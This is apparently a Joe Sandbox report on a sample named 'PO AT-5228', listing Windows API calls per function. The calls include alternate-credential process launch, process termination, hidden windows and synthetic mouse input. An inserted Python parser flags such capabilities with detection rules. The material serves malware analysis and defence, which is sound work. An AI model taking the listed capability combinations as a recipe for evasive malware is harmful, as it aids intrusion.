                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: 61b37753a21c295dc998936141a47021b53633e9e2eb9df3d90e9895b817691c
                                                                                        • Instruction ID: 6b419e6eaffa3ccd060e75f06b445b2c6c6247f7ed446365e78aae90c96669e4
                                                                                        • Opcode Fuzzy Hash: 61b37753a21c295dc998936141a47021b53633e9e2eb9df3d90e9895b817691c
                                                                                        • Instruction Fuzzy Hash: EC416E71600104AFCB14EB64C9D5AFEB7EEEB58310F104699F51A97291DFB4EE44CB60
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 00B7AC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B7AC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 00B7ACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B7ACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00B7AD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BDE673
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                                                        • Instruction ID: 25923f1cc20dca5338bdde13be057e103830c1587683b3ef9b8997df2cf66b1f
                                                                                        • Opcode Fuzzy Hash: 003cf160d07936bbb37e9e383b61ce093fb4a91e8046d40bd7808cda9f1e5895
                                                                                        • Instruction Fuzzy Hash: 54419371104201AFC721DF24DC84F7E7BE8EB59320F1846A9F9A88B2A1D7719945DB62
APIs
• ShowWindow.USER32(00C21628,00000000,00C21628,00000000,00000000,00C21628,?,00BDDC5D,00000000,?,00000000,00000000,00000000,?,00BDDAD1,00000004), ref: 00BCE40B
• EnableWindow.USER32(00000000,00000000), ref: 00BCE42F
• ShowWindow.USER32(00C21628,00000000), ref: 00BCE48F
• ShowWindow.USER32(00000000,00000004), ref: 00BCE4A1
• EnableWindow.USER32(00000000,00000001), ref: 00BCE4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BCE4E8
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
• Instruction ID: b6a9d1618646c62f4b31ce45580f4c901aacc6ad305fbf76dd59db533ff27d71
• Opcode Fuzzy Hash: a12675204d87bffd70a8e7a54b465daa070497abd4257b103602cf27d33918f9
• Instruction Fuzzy Hash: 49413E34601141EFDB2ACF24C499FA87BE1FF09304F5881E9EA698F2A2C771E841CB51
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 00BA98D1
  • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
  • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BA9908
• EnterCriticalSection.KERNEL32(?), ref: 00BA9924
• LeaveCriticalSection.KERNEL32(?), ref: 00BA999E
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BA99B3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA99D2
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 2537439066-0
• Opcode ID: 8a8a13554fafb644854bdf8d4621b706777ea2e476487ca9ee889b5c54a4310c
• Instruction ID: 8a303c6592b0e924c7e3cf4733b8f5ddb0c0cfb1a3f9da777b344a7c834efc95
• Opcode Fuzzy Hash: 8a8a13554fafb644854bdf8d4621b706777ea2e476487ca9ee889b5c54a4310c
• Instruction Fuzzy Hash: 5A318F31A00105AFDB00AFA5DC85EAFB7B9FF45310B1480A9F914AB286DB74DE10DBA5
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00BB77F4,?,?,00000000,00000001), ref: 00BB9B53
  • Part of subcall function 00BB6544: GetWindowRect.USER32(?,?), ref: 00BB6557
• GetDesktopWindow.USER32 ref: 00BB9B7D
• GetWindowRect.USER32(00000000), ref: 00BB9B84
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00BB9BB6
  • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
• GetCursorPos.USER32(?), ref: 00BB9BE2
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BB9C44
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
• Instruction ID: 5cba41ff0755ac5588dd90b0cadfade21baae686c118b2a88f4066bde58baace
• Opcode Fuzzy Hash: bb7f1925da394e9e9a97b67e5f3cbe58500b2d6be59d2dcc14b7689b51a94d65
• Instruction Fuzzy Hash: 5B31C172208355AFC720DF14DC89FAAB7E9FF89314F00096AF695D7191DAB1E904CB91
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B9AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00B9AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B9AFC4
• CloseHandle.KERNEL32(00000004), ref: 00B9AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00B9B012
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
• Instruction ID: d8e6851dd3b5ead1426e4ba24e2f770fb840d0858ec82b1955b0212e9681782e
• Opcode Fuzzy Hash: c707903b4af00e10a975cac71a232c66e6d88926c56159adacb230d711b69fe2
• Instruction Fuzzy Hash: 7A215E72100249AFDF128F94ED89FAE7BE9EF44304F144065FA01A6161C7B69D21EBA1
APIs
  • Part of subcall function 00B7AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
  • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7AFF2
  • Part of subcall function 00B7AF83: BeginPath.GDI32(?), ref: 00B7B009
  • Part of subcall function 00B7AF83: SelectObject.GDI32(?,00000000), ref: 00B7B033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00BCEC20
• LineTo.GDI32(00000000,00000003,?), ref: 00BCEC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BCEC42
• LineTo.GDI32(00000000,00000000,?), ref: 00BCEC52
• EndPath.GDI32(00000000), ref: 00BCEC62
• StrokePath.GDI32(00000000), ref: 00BCEC72
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
• Instruction ID: 692a1aa0b4cfd4ace9f00943e39d49de6d4c58d58a0ca0e3e8dd5ff0039e067b
• Opcode Fuzzy Hash: ac3d2492cf65be73c7ce8d5d01722da2d2725e45e41655482bbe9ade303d5d7b
• Instruction Fuzzy Hash: 77110C72000149BFDF119F90DC88FDA7F6DEB08360F048156BE189A161D7719D55DBA0
APIs
• GetDC.USER32(00000000), ref: 00B9E1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00B9E1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B9E1D8
• ReleaseDC.USER32(00000000,00000000), ref: 00B9E1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B9E1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 00B9E209
  • Part of subcall function 00B99AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00B99A05,00000000,00000000,?,00B99DDB), ref: 00B9A53A
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
• Instruction ID: 465b3a950918bdab93f65673512d0eca78275a5546dae73cf7c3ba71e375700a
• Opcode Fuzzy Hash: 369525c4e19bfb91a4a6ab3d6b207e02f24c628882ef796df71a8ff57f018d41
• Instruction Fuzzy Hash: 180184B5A00254BFEF109BA58C45B5EBFB9EF48751F044066EA04AB290DA719C00CB60
APIs
• __init_pointers.LIBCMT ref: 00B87B47
  • Part of subcall function 00B8123A: __initp_misc_winsig.LIBCMT ref: 00B8125E
  • Part of subcall function 00B8123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B87F51
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B87F65
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B87F78
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B87F8B
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B87F9E
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B87FB1
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B87FC4
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B87FD7
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B87FEA
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B87FFD
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B88010
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B88023
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B88036
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B88049
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B8805C
  • Part of subcall function 00B8123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00B8806F
• __mtinitlocks.LIBCMT ref: 00B87B4C
  • Part of subcall function 00B87E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00C1AC68,00000FA0,?,?,00B87B51,00B85E77,00C16C70,00000014), ref: 00B87E41
• __mtterm.LIBCMT ref: 00B87B55
  • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D3F
  • Part of subcall function 00B87BBD: _free.LIBCMT ref: 00B87D46
  • Part of subcall function 00B87BBD: DeleteCriticalSection.KERNEL32(00C1AC68,?,?,00B87B5A,00B85E77,00C16C70,00000014), ref: 00B87D68
• __calloc_crt.LIBCMT ref: 00B87B7A
• GetCurrentThreadId.KERNEL32 ref: 00B87BA3
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
• String ID:
• API String ID: 2942034483-0
• Opcode ID: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
• Instruction ID: 4a43933cb6f16cbacf5cf2505e65e6984bd90daf046e0e36019173d6f99f5043
• Opcode Fuzzy Hash: 92ae30d8221ed9205dc5d56e04da96330d38c499c4ac9bd64409275023fbc946
• Instruction Fuzzy Hash: 55F06D3219D65219E628BA34BD16B4A26CA9B02739B3046E9F9A4D50F2EF20C842C361
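The function records above all follow one layout: an "APIs" list of "Name.MODULE(args), ref: address" lines, with indented "Part of subcall function" lines for calls made by a callee rather than by the function itself. That distinction matters when triaging: the CRT initialisation block above, for instance, reaches GetProcAddress only through a subcall, while the CreateProcessWithLogonW block calls OpenProcessToken, CreateEnvironmentBlock and CreateProcessWithLogonW directly, and the ShowWindow block passes nCmdShow = 0 (SW_HIDE) twice. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in this layout, keeps direct and subcall calls apart, and applies a few illustrative capability rules. The two sample blocks are constructed for the example (condensed from the ShowWindow and CreateProcessWithLogonW records above, with a GetDesktopWindow line added to exercise the no-argument form); the rule names and API groupings are this example's own, not Joe Sandbox signature logic; SW_HIDE = 0 is the Win32 constant.

```python
"""Parse Joe Sandbox per-function "APIs" blocks and flag behaviours (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed samples in the report's layout (not copied verbatim from the report).
SAMPLE_RUNAS = """\
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B9AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00B9AFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B9AFC4
• CloseHandle.KERNEL32(00000004), ref: 00B9AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B9AFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00B9B012
  • Part of subcall function 00B99AA3: RaiseException.KERNEL32(-C0000018,00000001), ref: 00B9A53A
"""

SAMPLE_SHOWWINDOW = """\
APIs
• ShowWindow.USER32(00C21628,00000000,00C21628,?,00BDDC5D), ref: 00BCE40B
• EnableWindow.USER32(00000000,00000000), ref: 00BCE42F
• ShowWindow.USER32(00C21628,00000000), ref: 00BCE48F
• ShowWindow.USER32(00000000,00000004), ref: 00BCE4A1
• GetDesktopWindow.USER32 ref: 00BB9B7D
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BCE4E8
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), "ref: addr".
# Names may contain "::" and "@N" (std::exception::exception, __CxxThrowException@8).
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w:@$]*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

SW_HIDE = 0  # Win32 nCmdShow value that hides the window


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw hex/name tokens; "?" = unresolved by the sandbox
    ref: int                 # address of the call site
    subcall_of: Optional[int]  # callee address if listed under "Part of subcall"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)

    def direct_apis(self) -> Set[str]:
        return {c.api for c in self.calls if c.subcall_of is None}

    def all_apis(self) -> Set[str]:
        return {c.api for c in self.calls}


def parse_api_block(text: str) -> FunctionRecord:
    """Turn one 'APIs' block into structured calls; non-matching lines are skipped."""
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        rec.calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"), args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
    return rec


# Illustrative rules (this example's own): every API in the set must be present.
CAPABILITY_RULES: Dict[str, Set[str]] = {
    "process creation under alternate credentials":
        {"OpenProcessToken", "CreateEnvironmentBlock", "CreateProcessWithLogonW"},
    "synthetic mouse input": {"GetCursorPos", "mouse_event"},
}


def match_capabilities(rec: FunctionRecord, include_subcalls: bool = True) -> List[str]:
    apis = rec.all_apis() if include_subcalls else rec.direct_apis()
    return [name for name, needed in CAPABILITY_RULES.items() if needed <= apis]


def hidden_window_refs(rec: FunctionRecord) -> List[int]:
    """Call sites of direct ShowWindow calls whose resolved nCmdShow is SW_HIDE."""
    out = []
    for c in rec.calls:
        if c.api != "ShowWindow" or c.subcall_of is not None or len(c.args) < 2:
            continue
        try:
            if int(c.args[1], 16) == SW_HIDE:
                out.append(c.ref)
        except ValueError:
            continue  # "?" means the sandbox could not resolve the argument
    return out


def split_api_blocks(report_text: str) -> List[str]:
    """Split report text into one chunk per 'APIs' header line."""
    return re.split(r"(?m)^\s*APIs\s*$", report_text)[1:]


def scan_report(report_text: str) -> List[Tuple[Optional[int], List[str], List[int]]]:
    """(first direct call site, matched capabilities, SW_HIDE call sites) per function."""
    results = []
    for chunk in split_api_blocks(report_text):
        rec = parse_api_block(chunk)
        if not rec.calls:
            continue
        first_ref = next((c.ref for c in rec.calls if c.subcall_of is None), None)
        results.append((first_ref, match_capabilities(rec), hidden_window_refs(rec)))
    return results


if __name__ == "__main__":
    for first_ref, caps, hidden in scan_report(SAMPLE_RUNAS + SAMPLE_SHOWWINDOW):
        where = f"{first_ref:08X}" if first_ref is not None else "?"
        print(f"function @ {where}: {caps or '-'}; SW_HIDE at {[hex(r) for r in hidden]}")
```

Feeding the whole page text to scan_report works because every record begins with its own "APIs" line; the rules are deliberately minimal and meant to be extended with the combinations a given investigation cares about (thread-injection and credential-access primitives, for example), with include_subcalls=False when only the function's own behaviour should count.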
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B6281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00B62825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B62830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B6283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00B62843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B6284B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                                                        • Instruction ID: 6432f6e2e608fc2ff7827f59a56589754ea2ec08ef0546a9faee8ed741f982fe
                                                                                        • Opcode Fuzzy Hash: c7b622aa08772ac49e01a6d3db309df3ddafb382845240b81a9c33d461985f6d
                                                                                        • Instruction Fuzzy Hash: E7016CB0901B597DE3008F6A8C85B52FFA8FF15354F00411B915C47941C7F5A864CBE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        • Opcode ID: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                                                        • Instruction ID: 8b0f140ae556233471b8019d6c70da4325d23ecd641486f6c4e0257837eeee32
                                                                                        • Opcode Fuzzy Hash: 9e50ecbffef5ebd0b42ce2a80deb955424b92c3c09c4f74168996130027e4350
                                                                                        • Instruction Fuzzy Hash: 2701A432206221ABDB151B58ECC8DEB77A9FF89701B04046AF603DB0A0DFB59C00EB51
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00BA7C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00BA7C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00BA7C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00BA7C4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                                                        • Instruction ID: 91d22fc258f6d0a8f55f483109b4395c8743eaa1f06d379b7ba0754204ef0088
                                                                                        • Opcode Fuzzy Hash: 7c2f2ab89f73bec1c7c4a2d44d82c2cf41d0a89d41f5006d7d815a5cc4138b8c
                                                                                        • Instruction Fuzzy Hash: 50F03A72241198BFE7215B529C4EEEF7BBCEFC6B11F000158FA01AA051EBE05A41C6B5
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00BA9A33
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A5E
                                                                                          • Part of subcall function 00BA93D1: CloseHandle.KERNEL32(?,?,00BA9A6B,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA93DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA9A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00BD5DEE,?,?,?,?,?,00B6ED63), ref: 00BA9A78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
